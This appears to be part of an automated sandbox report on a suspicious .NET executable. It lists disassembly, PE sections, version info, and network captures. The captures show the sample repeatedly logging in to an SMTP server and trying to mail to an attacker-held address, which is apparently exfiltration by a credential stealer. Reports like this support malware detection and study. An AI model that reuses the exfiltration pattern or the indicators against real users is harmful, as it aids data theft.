                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add al, byte ptr [eax]
                                                                                          adc byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          and byte ptr [eax], al
                                                                                          add byte ptr [eax+00000018h], al
                                                                                          push eax
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], 00000000h
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add dword ptr [eax], eax
                                                                                          add dword ptr [eax], eax
                                                                                          add byte ptr [eax], al
                                                                                          cmp byte ptr [eax], al
                                                                                          add byte ptr [eax+00000000h], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add dword ptr [eax], eax
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], 00000000h
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x95f440x4f.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x960000x5fc.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x980000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000x93f9c0x94000False0.716264054582data7.05584068406IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x960000x5fc0x600False0.438151041667data4.24837573542IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x980000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountry
                                                                                          RT_VERSION0x960900x36cdata
                                                                                          RT_MANIFEST0x9640c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Version Infos

                                                                                          DescriptionData
                                                                                          Translation0x0000 0x04b0
                                                                                          LegalCopyrightCopyright 2014 - 2020
                                                                                          Assembly Version4.0.2.0
                                                                                          InternalNamezEzEVogzGVZLHnuzSL.exe
                                                                                          FileVersion4.0.2.0
                                                                                          CompanyName
                                                                                          LegalTrademarks
                                                                                          Comments
                                                                                          ProductNameControllerSets
                                                                                          ProductVersion4.0.2.0
                                                                                          FileDescriptionControllerSets
                                                                                          OriginalFilenamezEzEVogzGVZLHnuzSL.exe

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 14, 2021 03:38:21.418781996 CET49760587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:21.593882084 CET58749760208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:21.594029903 CET49760587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:22.217010975 CET58749760208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:22.217643023 CET49760587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:22.392175913 CET58749760208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:22.392225027 CET58749760208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:22.392793894 CET49760587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:22.567864895 CET58749760208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:22.570162058 CET49760587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:22.784493923 CET58749760208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:24.347907066 CET58749760208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:24.349411964 CET49760587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:24.523857117 CET58749760208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:24.524710894 CET58749760208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:24.524949074 CET49760587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:24.704446077 CET58749760208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:24.710376978 CET49760587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:24.885243893 CET58749760208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:24.885344028 CET49760587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:25.048193932 CET49761587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:25.221340895 CET58749761208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:25.221560955 CET49761587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:25.406002045 CET58749761208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:25.406280041 CET49761587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:25.579448938 CET58749761208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:25.579510927 CET58749761208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:25.579762936 CET49761587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:25.753851891 CET58749761208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:25.754308939 CET49761587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:25.967011929 CET58749761208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:27.434658051 CET58749761208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:27.434890032 CET49761587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:27.607774973 CET58749761208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:27.608792067 CET58749761208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:27.609004021 CET49761587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:27.786582947 CET58749761208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:27.787240028 CET49761587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:27.960613966 CET58749761208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:27.960807085 CET49761587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:42.297441959 CET49767587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:42.472275019 CET58749767208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:42.472691059 CET49767587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:42.650516987 CET58749767208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:42.651597977 CET49767587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:42.826456070 CET58749767208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:42.826545000 CET58749767208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:42.828066111 CET49767587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:43.003906012 CET58749767208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:43.005415916 CET49767587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:43.219484091 CET58749767208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:45.320012093 CET58749767208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:45.375214100 CET49767587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:45.617290974 CET49767587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:45.792380095 CET58749767208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:45.792956114 CET58749767208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:45.797069073 CET49767587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:45.976691961 CET58749767208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:45.977750063 CET49767587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:46.153063059 CET58749767208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:46.153325081 CET49767587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:46.932301044 CET49768587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:47.105688095 CET58749768208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:47.105859995 CET49768587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:47.283478975 CET58749768208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:47.283776999 CET49768587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:47.457153082 CET58749768208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:47.457199097 CET58749768208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:47.457685947 CET49768587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:47.632039070 CET58749768208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:47.632499933 CET49768587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:47.844892979 CET58749768208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:49.348474979 CET58749768208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:49.349335909 CET49768587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:49.522674084 CET58749768208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:49.523422003 CET58749768208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:49.540004969 CET49768587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:49.583519936 CET49769587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:49.718399048 CET58749768208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:49.719187021 CET49768587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:49.758477926 CET58749769208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:49.758692980 CET49769587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:49.892874956 CET58749768208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:49.893167019 CET49768587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:49.937963963 CET58749769208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:49.939066887 CET49769587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:50.114192963 CET58749769208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:50.114243984 CET58749769208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:50.115310907 CET49769587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:50.291225910 CET58749769208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:50.292011023 CET49769587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:50.506787062 CET58749769208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:52.550067902 CET58749769208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:52.553708076 CET49769587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:52.728867054 CET58749769208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:52.729701042 CET58749769208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:52.730365992 CET49769587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:52.910880089 CET58749769208.91.198.143192.168.2.4
                                                                                          Jan 14, 2021 03:38:52.912990093 CET49769587192.168.2.4208.91.198.143
                                                                                          Jan 14, 2021 03:38:53.088706970 CET58749769208.91.198.143192.168.2.4

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 14, 2021 03:37:32.869775057 CET5585453192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:32.917884111 CET53558548.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:33.825086117 CET6454953192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:33.872987032 CET53645498.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:35.021686077 CET6315353192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:35.080501080 CET53631538.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:36.235696077 CET5299153192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:36.292154074 CET53529918.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:37.114697933 CET5370053192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:37.162817001 CET53537008.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:38.049338102 CET5172653192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:38.105707884 CET53517268.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:39.018359900 CET5679453192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:39.074843884 CET53567948.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:39.992633104 CET5653453192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:40.040813923 CET53565348.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:40.919440031 CET5662753192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:40.970345974 CET53566278.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:41.781959057 CET5662153192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:41.832847118 CET53566218.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:42.736428022 CET6311653192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:42.784553051 CET53631168.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:43.726118088 CET6407853192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:43.776962042 CET53640788.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:55.673203945 CET6480153192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:55.721537113 CET53648018.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:37:59.766006947 CET6172153192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:37:59.824593067 CET53617218.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:13.161227942 CET5125553192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:13.278912067 CET53512558.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:13.854940891 CET6152253192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:13.920804024 CET53615228.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:14.537789106 CET5233753192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:14.594098091 CET53523378.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:15.246191025 CET5504653192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:15.282701969 CET4961253192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:15.310538054 CET53550468.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:15.338891983 CET53496128.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:15.963510036 CET4928553192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:16.019995928 CET53492858.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:16.780508041 CET5060153192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:16.841895103 CET53506018.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:17.578084946 CET6087553192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:17.637299061 CET53608758.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:18.742748022 CET5644853192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:18.799222946 CET53564488.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:19.939304113 CET5917253192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:19.998245001 CET53591728.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:20.532008886 CET6242053192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:20.579864025 CET53624208.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:21.248097897 CET6057953192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:21.314516068 CET53605798.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:21.361242056 CET5018353192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:21.409131050 CET53501838.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:32.267143965 CET6153153192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:32.327753067 CET53615318.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:42.216233015 CET4922853192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:42.275471926 CET53492288.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:38:49.480362892 CET5979453192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:38:49.536833048 CET53597948.8.8.8192.168.2.4
                                                                                          Jan 14, 2021 03:39:04.936846018 CET5591653192.168.2.48.8.8.8
                                                                                          Jan 14, 2021 03:39:04.985095024 CET53559168.8.8.8192.168.2.4

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                          Jan 14, 2021 03:38:21.248097897 CET192.168.2.48.8.8.80xa34Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:42.216233015 CET192.168.2.48.8.8.80xf9fbStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:49.480362892 CET192.168.2.48.8.8.80xb926Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                          Jan 14, 2021 03:38:21.314516068 CET8.8.8.8192.168.2.40xa34No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:21.314516068 CET8.8.8.8192.168.2.40xa34No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:21.314516068 CET8.8.8.8192.168.2.40xa34No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:21.314516068 CET8.8.8.8192.168.2.40xa34No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:42.275471926 CET8.8.8.8192.168.2.40xf9fbNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:42.275471926 CET8.8.8.8192.168.2.40xf9fbNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:42.275471926 CET8.8.8.8192.168.2.40xf9fbNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:42.275471926 CET8.8.8.8192.168.2.40xf9fbNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:49.536833048 CET8.8.8.8192.168.2.40xb926No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:49.536833048 CET8.8.8.8192.168.2.40xb926No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:49.536833048 CET8.8.8.8192.168.2.40xb926No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                          Jan 14, 2021 03:38:49.536833048 CET8.8.8.8192.168.2.40xb926No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)

                                                                                          SMTP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                          Jan 14, 2021 03:38:22.217010975 CET58749760208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                          Jan 14, 2021 03:38:22.217643023 CET49760587192.168.2.4208.91.198.143EHLO 445817
                                                                                          Jan 14, 2021 03:38:22.392225027 CET58749760208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Jan 14, 2021 03:38:22.392793894 CET49760587192.168.2.4208.91.198.143AUTH login bndhbWFAYnVsa2xvZ3MudG9w
                                                                                          Jan 14, 2021 03:38:22.567864895 CET58749760208.91.198.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:38:24.347907066 CET58749760208.91.198.143192.168.2.4535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:38:24.349411964 CET49760587192.168.2.4208.91.198.143MAIL FROM:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:38:24.524710894 CET58749760208.91.198.143192.168.2.4250 2.1.0 Ok
                                                                                          Jan 14, 2021 03:38:24.524949074 CET49760587192.168.2.4208.91.198.143RCPT TO:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:38:24.704446077 CET58749760208.91.198.143192.168.2.4554 5.7.1 <nwama@bulklogs.top>: Relay access denied
                                                                                          Jan 14, 2021 03:38:25.406002045 CET58749761208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                          Jan 14, 2021 03:38:25.406280041 CET49761587192.168.2.4208.91.198.143EHLO 445817
                                                                                          Jan 14, 2021 03:38:25.579510927 CET58749761208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Jan 14, 2021 03:38:25.579762936 CET49761587192.168.2.4208.91.198.143AUTH login bndhbWFAYnVsa2xvZ3MudG9w
                                                                                          Jan 14, 2021 03:38:25.753851891 CET58749761208.91.198.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:38:27.434658051 CET58749761208.91.198.143192.168.2.4535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:38:27.434890032 CET49761587192.168.2.4208.91.198.143MAIL FROM:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:38:27.608792067 CET58749761208.91.198.143192.168.2.4250 2.1.0 Ok
                                                                                          Jan 14, 2021 03:38:27.609004021 CET49761587192.168.2.4208.91.198.143RCPT TO:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:38:27.786582947 CET58749761208.91.198.143192.168.2.4554 5.7.1 <nwama@bulklogs.top>: Relay access denied
                                                                                          Jan 14, 2021 03:38:42.650516987 CET58749767208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                          Jan 14, 2021 03:38:42.651597977 CET49767587192.168.2.4208.91.198.143EHLO 445817
                                                                                          Jan 14, 2021 03:38:42.826545000 CET58749767208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Jan 14, 2021 03:38:42.828066111 CET49767587192.168.2.4208.91.198.143AUTH login bndhbWFAYnVsa2xvZ3MudG9w
                                                                                          Jan 14, 2021 03:38:43.003906012 CET58749767208.91.198.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:38:45.320012093 CET58749767208.91.198.143192.168.2.4535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:38:45.617290974 CET49767587192.168.2.4208.91.198.143MAIL FROM:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:38:45.792956114 CET58749767208.91.198.143192.168.2.4250 2.1.0 Ok
                                                                                          Jan 14, 2021 03:38:45.797069073 CET49767587192.168.2.4208.91.198.143RCPT TO:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:38:45.976691961 CET58749767208.91.198.143192.168.2.4554 5.7.1 <nwama@bulklogs.top>: Relay access denied
                                                                                          Jan 14, 2021 03:38:47.283478975 CET58749768208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                          Jan 14, 2021 03:38:47.283776999 CET49768587192.168.2.4208.91.198.143EHLO 445817
                                                                                          Jan 14, 2021 03:38:47.457199097 CET58749768208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Jan 14, 2021 03:38:47.457685947 CET49768587192.168.2.4208.91.198.143AUTH login bndhbWFAYnVsa2xvZ3MudG9w
                                                                                          Jan 14, 2021 03:38:47.632039070 CET58749768208.91.198.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:38:49.348474979 CET58749768208.91.198.143192.168.2.4535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:38:49.349335909 CET49768587192.168.2.4208.91.198.143MAIL FROM:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:38:49.523422003 CET58749768208.91.198.143192.168.2.4250 2.1.0 Ok
                                                                                          Jan 14, 2021 03:38:49.540004969 CET49768587192.168.2.4208.91.198.143RCPT TO:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:38:49.718399048 CET58749768208.91.198.143192.168.2.4554 5.7.1 <nwama@bulklogs.top>: Relay access denied
                                                                                          Jan 14, 2021 03:38:49.937963963 CET58749769208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                          Jan 14, 2021 03:38:49.939066887 CET49769587192.168.2.4208.91.198.143EHLO 445817
                                                                                          Jan 14, 2021 03:38:50.114243984 CET58749769208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
